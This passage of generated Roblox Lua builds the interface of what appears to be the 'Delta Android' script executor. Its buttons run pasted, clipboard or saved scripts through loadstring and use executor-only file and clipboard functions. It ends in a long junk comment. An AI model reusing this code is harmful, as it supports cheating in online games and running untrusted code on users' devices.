easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { ImageRectSize = size } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenSliceScale(frame, scale, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(scale, "No scale provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { SliceScale = scale } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenTextColor3(frame, color, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(color, "No color provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { TextColor3 = color } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenMaxVisibleGraphemes(frame, graphemes, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(graphemes, "No graphemes provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { MaxVisibleGraphemes = graphemes } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenTextSize(frame, size, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(size, "No size provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { TextSize = size } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenTextStrokeColor3(frame, color, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(color, "No color provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { TextStrokeColor3 = color } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenTextTransparency(frame, transparency, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(transparency, "No transparency provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { TextTransparency = transparency } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenTextStrokeTransparency(frame, transparency, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(transparency, "No transparency provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { TextStrokeTransparency = transparency } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenCanvasSize(frame, size, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(size, "No size provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { CanvasSize = size } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenCanvasPosition(frame, position, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(position, "No position provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { CanvasPosition = position } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenScrollBarImageTransparency(frame, transparency, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(transparency, "No transparency provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { ScrollBarImageTransparency = transparency } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenScrollBarThickness(frame, thickness, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(thickness, "No thickness provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { ScrollBarThickness = thickness } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenScrollBarImageColor3(frame, color, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(color, "No color provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { ScrollBarImageColor3 = color } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenCFrame(thing, cframe, timelen, easingstyle, easingdir) -- Errors & defaults assert(thing, "No instance provided") assert(cframe, "No cframe provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { CFrame = cframe } -- Finally, play tween tweenService:Create(thing, tinfo, goals):Play() end function module.TweenFOV(thing, fov, timelen, easingstyle, easingdir) -- Errors & defaults assert(thing, "No instance provided") assert(fov, "No FOV provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { FieldOfView = fov } -- Finally, play tween tweenService:Create(thing, tinfo, goals):Play() end function module.TweenValue(thing, value, timelen, easingstyle, easingdir) -- Errors & defaults assert(thing, "No instance provided") assert(value, "No value provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { Value = value } -- Finally, play tween tweenService:Create(thing, tinfo, goals):Play() end function module.TweenVolume(thing, volume, timelen, easingstyle, easingdir) -- Errors & defaults assert(thing, "No instance provided") assert(volume, "No volume provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { Volume = volume } -- Finally, play tween tweenService:Create(thing, tinfo, goals):Play() end return module end; }; G2L_MODULES[G2L["b7"]] = { Closure = function() local script = G2L["b7"]; local module = {} function module.next(self) self.position += 1 local character = self.text:sub(self.position, self.position) if character == "\n" or character == " " or self.position > #self.text then return self.position - 1 else return self:next() end end function module.prev(self) self.position -= 1 local character = self.text:sub(self.position, self.position) if character == "\n" or character == " " or self.position < 1 then return self.position + 1 else return self:prev() end end function module.GetCurrentWord(self, textbox) self.cursorPosition = textbox.CursorPosition self.position = self.cursorPosition self.text = textbox.Text local wordEnd = self:next() local wordStart = self:prev() local wordString = self.text:sub(wordStart, wordEnd) return wordString end return module end; }; G2L_MODULES[G2L["b8"]] = { Closure = function() local script = G2L["b8"]; --[[ Lexical scanner for creating a sequence of tokens from Lua source code. This is a heavily modified and Roblox-optimized version of the original Penlight Lexer module: https://github.com/stevedonovan/Penlight Authors: stevedonovan ----------------- Original Penlight lexer author ryanjmulder ----------------- Penlight lexer contributer mpeterv ----------------- Penlight lexer contributer Tieske ----------------- Penlight lexer contributer boatbomber ----------------- Roblox port, optimizations, and bug fixes Sleitnick ----------------- Roblox optimizations Usage: local source = "for i = 1,n do end" -- The 'scan' function returns a token iterator: for token,src in lexer.scan(source) do print(token, src) end > keyword for > iden i > = = > number 1 > , , > iden n > keyword do > keyword end List of tokens: - keyword - builtin - iden - string - number - space - comment Other tokens that don't fall into the above categories will simply be returned as itself. For instance, operators like "+" will simply return "+" as the token. --]] local lexer = {} local yield, wrap = coroutine.yield, coroutine.wrap local strfind = string.find local strsub = string.sub local append = table.insert local type = type local NUMBER1 = "^[%+%-]?%d+%.?%d*[eE][%+%-]?%d+" local NUMBER2 = "^[%+%-]?%d+%.?%d*" local NUMBER3 = "^0x[%da-fA-F]+" local NUMBER4 = "^%d+%.?%d*[eE][%+%-]?%d+" local NUMBER5 = "^%d+%.?%d*" local IDEN = "^[%a_][%w_]*" local WSPACE = "^%s+" local STRING1 = "^(['\"])%1" --Empty String local STRING2 = [[^(['"])(\*)%2%1]] local STRING3 = [[^(['"]).-[^\](\*)%2%1]] local STRING4 = "^(['\"]).-.*" --Incompleted String local STRING5 = "^%[(=*)%[.-%]%1%]" --Multiline-String local STRING6 = "^%[%[.-.*" --Incompleted Multiline-String local CHAR1 = "^''" local CHAR2 = [[^'(\*)%1']] local CHAR3 = [[^'.-[^\](\*)%1']] local PREPRO = "^#.-[^\\]\n" local MCOMMENT1 = "^%-%-%[(=*)%[.-%]%1%]" --Completed Multiline-Comment local MCOMMENT2 = "^%-%-%[%[.-.*" --Incompleted Multiline-Comment local SCOMMENT1 = "^%-%-.-\n" --Completed Singleline-Comment local SCOMMENT2 = "^%-%-.-.*" --Incompleted Singleline-Comment local THINGY = "^[%.:]%w-%s?%(.-%)" local lua_keyword = { ["and"] = true, ["break"] = true, ["do"] = true, ["else"] = true, ["elseif"] = true, ["end"] = true, ["false"] = true, ["for"] = true, ["function"] = true, ["if"] = true, ["in"] = true, ["local"] = true, ["nil"] = true, ["not"] = true, ["while"] = true, ["or"] = true, ["repeat"] = true, ["return"] = true, ["then"] = true, ["true"] = true, ["self"] = true, ["until"] = true } local lua_builtin = { ["assert"] = true;["collectgarbage"] = true;["error"] = true;["_G"] = true; ["gcinfo"] = true;["getfenv"] = true;["getmetatable"] = true;["ipairs"] = true; ["loadstring"] = true;["newproxy"] = true;["next"] = true;["pairs"] = true; ["pcall"] = true;["print"] = true;["rawequal"] = true;["rawget"] = true;["rawset"] = true; ["select"] = true;["setfenv"] = true;["setmetatable"] = true;["tonumber"] = true; ["tostring"] = true;["type"] = true;["unpack"] = true;["_VERSION"] = true;["xpcall"] = true; ["delay"] = true;["elapsedTime"] = true;["require"] = true;["spawn"] = true;["tick"] = true; ["time"] = true;["typeof"] = true;["UserSettings"] = true;["wait"] = true;["warn"] = true; ["game"] = true;["Enum"] = true;["script"] = true;["shared"] = true;["workspace"] = true; ["Axes"] = true;["BrickColor"] = true;["CFrame"] = true;["Color3"] = true;["ColorSequence"] = true; ["ColorSequenceKeypoint"] = true;["Faces"] = true;["Instance"] = true;["NumberRange"] = true; ["NumberSequence"] = true;["NumberSequenceKeypoint"] = true;["PhysicalProperties"] = true; ["Random"] = true;["Ray"] = true;["Rect"] = true;["Region3"] = true;["Region3int16"] = true; ["TweenInfo"] = true;["UDim"] = true;["UDim2"] = true;["Vector2"] = true;["Vector3"] = true; ["Vector3int16"] = true;["next"] = true;["dofile"] = true;["writefile"] = true;["readfile"] = true; ["isfile"] = true;["delfile"] = true;["isfolder"] = true;["makefolder"] = true;["delfolder"] = true;["listfiles"] = true; ["descend"] = true; ["os"] = true; --["os.time"] = true;["os.date"] = true;["os.difftime"] = true; ["debug"] = true; --["debug.traceback"] = true;["debug.profilebegin"] = true;["debug.profileend"] = true; ["math"] = true; --["math.abs"] = true;["math.acos"] = true;["math.asin"] = true;["math.atan"] = true;["math.atan2"] = true;["math.ceil"] = true;["math.clamp"] = true;["math.cos"] = true;["math.cosh"] = true;["math.deg"] = true;["math.exp"] = true;["math.floor"] = true;["math.fmod"] = true;["math.frexp"] = true;["math.ldexp"] = true;["math.log"] = true;["math.log10"] = true;["math.max"] = true;["math.min"] = true;["math.modf"] = true;["math.noise"] = true;["math.pow"] = true;["math.rad"] = true;["math.random"] = true;["math.randomseed"] = true;["math.sign"] = true;["math.sin"] = true;["math.sinh"] = true;["math.sqrt"] = true;["math.tan"] = true;["math.tanh"] = true; ["coroutine"] = true; --["coroutine.create"] = true;["coroutine.resume"] = true;["coroutine.running"] = true;["coroutine.status"] = true;["coroutine.wrap"] = true;["coroutine.yield"] = true; ["string"] = true; --["string.byte"] = true;["string.char"] = true;["string.dump"] = true;["string.find"] = true;["string.format"] = true;["string.len"] = true;["string.lower"] = true;["string.match"] = true;["string.rep"] = true;["string.reverse"] = true;["string.sub"] = true;["string.upper"] = true;["string.gmatch"] = true;["string.gsub"] = true; ["table"] = true; --["table.concat"] = true;["table.insert"] = true;["table.remove"] = true;["table.sort"] = true; } local function tdump(tok) return yield(tok, tok) end local function ndump(tok) return yield("number", tok) end local function sdump(tok) return yield("string", tok) end local function cdump(tok) return yield("comment", tok) end local function wsdump(tok) return yield("space", tok) end local function lua_vdump(tok) if (lua_keyword[tok]) then return yield("keyword", tok) elseif (lua_builtin[tok]) then return yield("builtin", tok) else return yield("iden", tok) end end local function thingy_dump(tok) return yield("thingy", tok) end local lua_matches = { {THINGY, thingy_dump}, {IDEN, lua_vdump}, -- Indentifiers {WSPACE, wsdump}, -- Whitespace {NUMBER3, ndump}, -- Numbers {NUMBER4, ndump}, {NUMBER5, ndump}, {STRING1, sdump}, -- Strings {STRING2, sdump}, {STRING3, sdump}, {STRING4, sdump}, {STRING5, sdump}, -- Multiline-Strings {STRING6, sdump}, -- Multiline-Strings {MCOMMENT1, cdump}, -- Multiline-Comments {MCOMMENT2, cdump}, {SCOMMENT1, cdump}, -- Singleline-Comments {SCOMMENT2, cdump}, {"^==", tdump}, -- Operators {"^~=", tdump}, {"^<=", tdump}, {"^>=", tdump}, {"^%.%.%.", tdump}, {"^%.%.", tdump}, {"^.", tdump}, } local num_lua_matches = #lua_matches --- Create a plain token iterator from a string. -- @tparam string s a string. function lexer.scan(s) local function lex(first_arg) local line_nr = 0 local sz = #s local idx = 1 -- res is the value used to resume the coroutine. local function handle_requests(res) while (res) do local tp = type(res) -- Insert a token list: if (tp == "table") then res = yield("", "") for i = 1,#res do local t = res[i] res = yield(t[1], t[2]) end elseif (tp == "string") then -- Or search up to some special pattern: local i1, i2 = strfind(s, res, idx) if (i1) then local tok = strsub(s, i1, i2) idx = (i2 + 1) res = yield("", tok) else res = yield("", "") idx = (sz + 1) end else res = yield(line_nr, idx) end end end handle_requests(first_arg) line_nr = 1 while (true) do if (idx > sz) then while (true) do handle_requests(yield()) end end for i = 1,num_lua_matches do local m = lua_matches[i] local pat = m[1] local fun = m[2] local findres = {strfind(s, pat, idx)} local i1, i2 = findres[1], findres[2] if (i1) then local tok = strsub(s, i1, i2) idx = (i2 + 1) lexer.finished = (idx > sz) local res = fun(tok, findres) if (tok:find("\n")) then -- Update line number: local _,newlines = tok:gsub("\n", {}) line_nr = (line_nr + newlines) end handle_requests(res) break end end end end return wrap(lex) end return lexer end; }; G2L_MODULES[G2L["b9"]] = { Closure = function() local script = G2L["b9"]; local module = {} --// Vars local words = require(script.Parent.Words) local GetWord = require(script.Parent.GetWord) local getLine = require(script.Parent.GetLine) --// Funcs function module.GetCurrentWord(self) return GetWord:GetCurrentWord(self.Textbox) end function module.Search(self) return nil end function module.Start(self, editor) self.Editor = editor self.Textbox = editor.Scroll.Source self.SuggestionButton = self.Textbox.Suggestion self.Textbox:GetPropertyChangedSignal("Text"):Connect(function() local foundWord, matchedLength = nil if foundWord then local position = UDim2.new(0, 0,0, getLine:GetCurrentLine(self.Textbox) * self.Textbox.TextSize) self.SuggestionButton.Text = foundWord self.SuggestionButton.Position = position self.SuggestionButton.Visible = true self.MatchedLength = matchedLength else self.SuggestionButton.Visible = false end end) self.SuggestionButton.MouseButton1Click:Connect(function(input) -- Fill in the word local word = self.SuggestionButton.Text self.SuggestionButton.Visible = false self.Textbox.Text = self.Textbox.Text:sub(1, self.Textbox.CursorPosition - 1 - (self.MatchedLength or 0)) .. word .. self.Textbox.Text:sub(self.Textbox.CursorPosition + 1, #self.Textbox.Text) local newCursorPosition = self.Textbox.CursorPosition + #word - self.MatchedLength wait() self.Textbox:ReleaseFocus() self.Textbox:CaptureFocus() self.Textbox.CursorPosition = newCursorPosition end) end return module end; }; G2L_MODULES[G2L["ba"]] = { Closure = function() local script = G2L["ba"]; local words = { ['print'] = 'builtin', ['warn'] = 'builtin', ['Vector3'] = 'builtin', ['Vector2'] = 'builtin', ['error'] = 'builtin', ['Instance'] = 'builtin', ['game'] = 'builtin', ['script'] = 'builtin', ['workspace'] = 'builtin', ['while'] = 'keyword', ['true'] = 'keyword', ['false'] = 'keyword', ['then'] = 'keyword', ['do'] = 'keyword', ['if'] = 'keyword', } return words end; }; G2L_MODULES[G2L["bb"]] = { Closure = function() local script = G2L["bb"]; -- Fixes a Roblox bug with RichText -- If the bug gets fixed, this will break the editor (visually). -- In this case, please remove any instances of this module being used. local module = {} function module.Fix(textbox) if textbox.Text:sub(1, 1) ~= "\n" then textbox.Text = "\n" .. textbox.Text end textbox.Position = UDim2.new(0, -3.5,0,-8.8) textbox.Size = UDim2.new(1, 4,1, textbox.TextSize) end return module end; }; -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.Continue.TextButton.LocalScript local function C_12() local script = G2L["12"]; local btn = script.Parent local key = script.Parent.Parent.Parent.SideTextbox.MainTextBox btn.MouseButton1Click:Connect(function() if key.Text == "TEST KEY" then script.Parent.Parent.Parent.Parent.Parent.FloatingIcon.Visible =true script.Parent.Parent.Parent.Visible = false end end) end; task.spawn(C_12); -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.GetKey.TextButton.LocalScript local function C_19() local script = G2L["19"]; local btn = script.Parent btn.MouseButton1Click:Connect(function() setclipboard("LINK HERE") end) end; task.spawn(C_19); -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.JoinServer.TextButton.LocalScript local function C_20() local script = G2L["20"]; local btn = script.Parent btn.MouseButton1Click:Connect(function() setclipboard("LINK HERE") end) end; task.spawn(C_20); -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.Home.LocalScript local function C_30() local script = G2L["30"]; local btn = script.Parent btn.MouseButton1Click:Connect(function() btn.Image = btn.OnImage.Value for _,v in pairs(script.Parent.Parent:GetChildren()) do if v.Name ~= script.Parent.Name then if v:FindFirstChild("OffImage") and v:FindFirstChild("OnImage") then v.Image = v.OffImage.Value end end end for _,v in pairs(script.Parent.Parent.Parent.Parent.Tabs:GetChildren()) do if v.Name ~= btn.Name then v.Visible = false else v.Visible = true end end end) end; task.spawn(C_30); -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.MakeScript.LocalScript local function C_35() local script = G2L["35"]; local btn = script.Parent btn.MouseButton1Click:Connect(function() btn.Image = btn.OnImage.Value for _,v in pairs(script.Parent.Parent:GetChildren()) do if v.Name ~= script.Parent.Name then if v:FindFirstChild("OffImage") and v:FindFirstChild("OnImage") then v.Image = v.OffImage.Value end end end for _,v in pairs(script.Parent.Parent.Parent.Parent.Tabs:GetChildren()) do if v.Name ~= btn.Name then v.Visible = false else v.Visible = true end end end) end; task.spawn(C_35); -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.Minimize.LocalScript local function C_3a() local script = G2L["3a"]; local btn = script.Parent btn.MouseButton1Click:Connect(function() script.Parent.Parent.Parent.Parent.Parent.MainFrame.Visible = false script.Parent.Parent.Parent.Parent.Parent.Parent.FloatingIcon.Visible = true end) end; task.spawn(C_3a); -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.Settings.LocalScript local function C_3f() local script = G2L["3f"]; local btn = script.Parent btn.MouseButton1Click:Connect(function() btn.Image = btn.OnImage.Value for _,v in pairs(script.Parent.Parent:GetChildren()) do if v.Name ~= script.Parent.Name then if v:FindFirstChild("OffImage") and v:FindFirstChild("OnImage") then v.Image = v.OffImage.Value end end end for _,v in pairs(script.Parent.Parent.Parent.Parent.Tabs:GetChildren()) do if v.Name ~= btn.Name then v.Visible = false else v.Visible = true end end end) end; task.spawn(C_3f); -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Buttons.Scripts.LocalScript local function C_44() local script = G2L["44"]; local btn = script.Parent btn.MouseButton1Click:Connect(function() btn.Image = btn.OnImage.Value for _,v in pairs(script.Parent.Parent:GetChildren()) do if v.Name ~= script.Parent.Name then if v:FindFirstChild("OffImage") and v:FindFirstChild("OnImage") then v.Image = v.OffImage.Value end end end for _,v in pairs(script.Parent.Parent.Parent.Parent.Tabs:GetChildren()) do if v.Name ~= btn.Name then v.Visible = false else v.Visible = true end end end) end; task.spawn(C_44); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.GoBack.TextButton.LocalScript local function C_51() local script = G2L["51"]; local btn = script.Parent btn.MouseButton1Click:Connect(function() script.Parent.Parent.Parent.Parent.AddScript1.Visible = true script.Parent.Parent.Parent.Parent.ScriptTextbox.Visible = false script.Parent.Parent.Parent.Parent.Scripts.Visible = true script.Parent.Parent.Parent.Parent.TitleScript.Visible = false end) end; task.spawn(C_51); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.AddScript.TextButton.LocalScript local script = G2L["58"]; local btn = script.Parent local function AddScript(name, source, loading) if(loading == false) then makefolder("d_android_script_dir") writefile("d_android_script_dir/" .. name, source) end local parent = script.Parent.Parent.Parent.Parent.Scripts.ScriptFrame local hub = script.Parent.Parent.Parent.Parent.Scripts.LIST local newhub = hub:Clone() local scriptname = newhub.TitleScript.TextLabel local execbutton = newhub.Execute.TextButton local delbutton = newhub.Delete.TextButton newhub.Parent = parent newhub.Visible = true scriptname.Text = name execbutton.MouseButton1Click:Connect(function() loadstring(source)() game.StarterGui:SetCore("SendNotification", { Title = "Delta Android"; Text = "Successfully executed the script!"; Duration = 1; }) end) delbutton.MouseButton1Click:Connect(function() delfile("d_android_script_dir/"..name) newhub:Destroy() end) end for _, file in ipairs(listfiles("d_android_script_dir")) do AddScript(file:sub(22, #file), readfile(file), true) end btn.MouseButton1Click:Connect(function() script.Parent.Parent.Parent.Parent.AddScript1.Visible = true script.Parent.Parent.Parent.Parent.ScriptTextbox.Visible = false script.Parent.Parent.Parent.Parent.Scripts.Visible = true script.Parent.Parent.Parent.Parent.TitleScript.Visible = false AddScript(script.Parent.Parent.Parent.Parent.TitleScript.MainTextBox.Text, script.Parent.Parent.Parent.TextboxBar.Editor.Scroll.Source.Text, false) script.Parent.Parent.Parent.TextboxBar.Editor.Scroll.Source.Text = "" script.Parent.Parent.Parent.Parent.TitleScript.MainTextBox.Text = "" end) local function load_saved_scripts() --test end -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript local function C_5f() local script = G2L["5f"]; local ScriptEditor = require(script.ScriptEditor) local editor = ScriptEditor.new(script.Parent) end; task.spawn(C_5f); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Left.AdaptSize local function C_7a() local script = G2L["7a"]; local defaultSize = script.Parent.Size local textbox = script.Parent.Parent.Source textbox:GetPropertyChangedSignal("AbsoluteSize"):Connect(function() local height = textbox.AbsoluteSize.Y script.Parent.Size = UDim2.new( defaultSize.X.Scale, defaultSize.X.Offset, 0, height ) end) end; task.spawn(C_7a); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.MakeScript.AddScript1.TextButton.LocalScript local function C_93() local script = G2L["93"]; local btn = script.Parent btn.MouseButton1Click:Connect(function() script.Parent.Parent.Visible = false script.Parent.Parent.Parent.ScriptTextbox.Visible =true script.Parent.Parent.Parent.TitleScript.Visible = true script.Parent.Parent.Parent.Scripts.Visible = false end) end; task.spawn(C_93); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.Execute.TextButton.LocalScript local function C_9c() local script = G2L["9c"]; local btn = script.Parent btn.MouseButton1Click:Connect(function() loadstring(script.Parent.Parent.Parent.TextboxBar.Editor.Scroll.Source.Text)() game.StarterGui:SetCore("SendNotification", { Title = "Delta Android"; Text = "Successfully executed the script!"; Duration = 1; }) end) end; task.spawn(C_9c); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.Clear.TextButton.LocalScript local function C_a3() local script = G2L["a3"]; local btn = script.Parent btn.MouseButton1Click:Connect(function() script.Parent.Parent.Parent.TextboxBar.Editor.Scroll.Source.Text = '' end) end; task.spawn(C_a3); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.ExecuteClipboard.TextButton.LocalScript local function C_aa() local script = G2L["aa"]; local btn = script.Parent btn.MouseButton1Click:Connect(function() loadstring(getclipboard())() game.StarterGui:SetCore("SendNotification", { Title = "Delta Android"; Text = "Successfully executed from clipboard!"; Duration = 1; }) end) end; task.spawn(C_aa); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript local function C_af() local script = G2L["af"]; local ScriptEditor = require(script.ScriptEditor) local editor = ScriptEditor.new(script.Parent) end; task.spawn(C_af); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Left.AdaptSize local function C_ca() local script = G2L["ca"]; local defaultSize = script.Parent.Size local textbox = script.Parent.Parent.Source textbox:GetPropertyChangedSignal("AbsoluteSize"):Connect(function() local height = textbox.AbsoluteSize.Y script.Parent.Size = UDim2.new( defaultSize.X.Scale, defaultSize.X.Offset, 0, height ) end) end; task.spawn(C_ca); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Search.TextButton.LocalScript local function C_fd() local script = G2L["fd"]; local btn = script.Parent local function AddTab(imageTab, creator, scriptname, source) local scriptFrame = script.Parent.Parent.Parent.Scripts.ScriptFrame local newList = scriptFrame.Parent.Folder.LIST:Clone() local execute = newList.Execute.TextButton local save = newList.Save.TextButton local loadtext = newList.LoadText.TextButton local copy = newList.Copy.TextButton local hide = newList.Hide.TextButton local scname = newList.NameScript local credit = newList.Credit local img = newList.ImageButton newList.Name = scriptname newList.Parent = scriptFrame newList.Visible = true img.Image = imageTab credit.Text = "Uploaded by: "..creator scname.Text = scriptname execute.MouseButton1Click:Connect(function() loadstring(source)() game.StarterGui:SetCore("SendNotification", { Title = "Delta Android"; Text = "Successfully executed the script!"; Duration = 1; }) end) copy.MouseButton1Click:Connect(function() setclipboard(source) game.StarterGui:SetCore("SendNotification", { Title = "Delta Android"; Text = "Successfully copied the script!"; Duration = 5; }) end) save.MouseButton1Click:Connect(function() AddScript(scriptname, source, false) game.StarterGui:SetCore("SendNotification", { Title = "Delta Android"; Text = "Sucessfully saved the script in the script hub"; Duration = 5; }) --assaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaassaaaaaaaaa